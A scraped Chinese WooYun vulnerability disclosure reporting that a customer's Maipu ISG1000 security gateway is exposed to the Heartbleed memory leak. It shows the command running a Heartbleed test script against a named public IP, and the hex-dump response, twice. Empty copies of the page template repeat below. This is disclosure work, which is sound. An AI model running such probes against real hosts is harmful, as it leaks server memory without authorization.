迈普某用户ISG1000 安全网关存在严重信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110520

漏洞标题：迈普某用户ISG1000 安全网关存在严重信息泄露

漏洞作者：大大灰狼

提交时间：2015-04-27 09:48

修复时间：2015-05-02 09:50

公开时间：2015-05-02 09:50

漏洞类型：重要敏感信息泄露

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-27：细节已通知厂商并且等待厂商处理中
2015-05-02：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

迈普ISG1000 安全网关存在严重信息泄露

详细说明：

漏洞IP：https://101.69.217.162

E:\????\123456\??????>ssltest.py 101.69.217.162|more
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 707
 ... received message: type = 22, ver = 0302, length = 203
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 12307
Received heartbeat response:
  0000: 02 30 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .0....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 00 00 00 00  ....#...........
  00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

漏洞证明：

E:\????\123456\??????>ssltest.py 101.69.217.162|more
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 707
 ... received message: type = 22, ver = 0302, length = 203
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 12307
Received heartbeat response:
  0000: 02 30 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .0....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 00 00 00 00  ....#...........
  00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

修复方案：

无

版权声明：转载请注明来源大大灰狼@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-05-02 09:50

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110520

漏洞标题：迈普某用户ISG1000 安全网关存在严重信息泄露

相关厂商：maipu.cn

漏洞作者：大大灰狼

提交时间：2015-04-27 09:48

修复时间：2015-05-02 09:50

公开时间：2015-05-02 09:50

漏洞类型：重要敏感信息泄露

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源大大灰狼@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110520

漏洞标题：迈普某用户ISG1000 安全网关存在严重信息泄露

相关厂商：maipu.cn

漏洞作者： 大大灰狼

提交时间：2015-04-27 09:48

修复时间：2015-05-02 09:50

公开时间：2015-05-02 09:50

漏洞类型：重要敏感信息泄露

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0110520"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 大大灰狼@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：大大灰狼

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源大大灰狼@乌云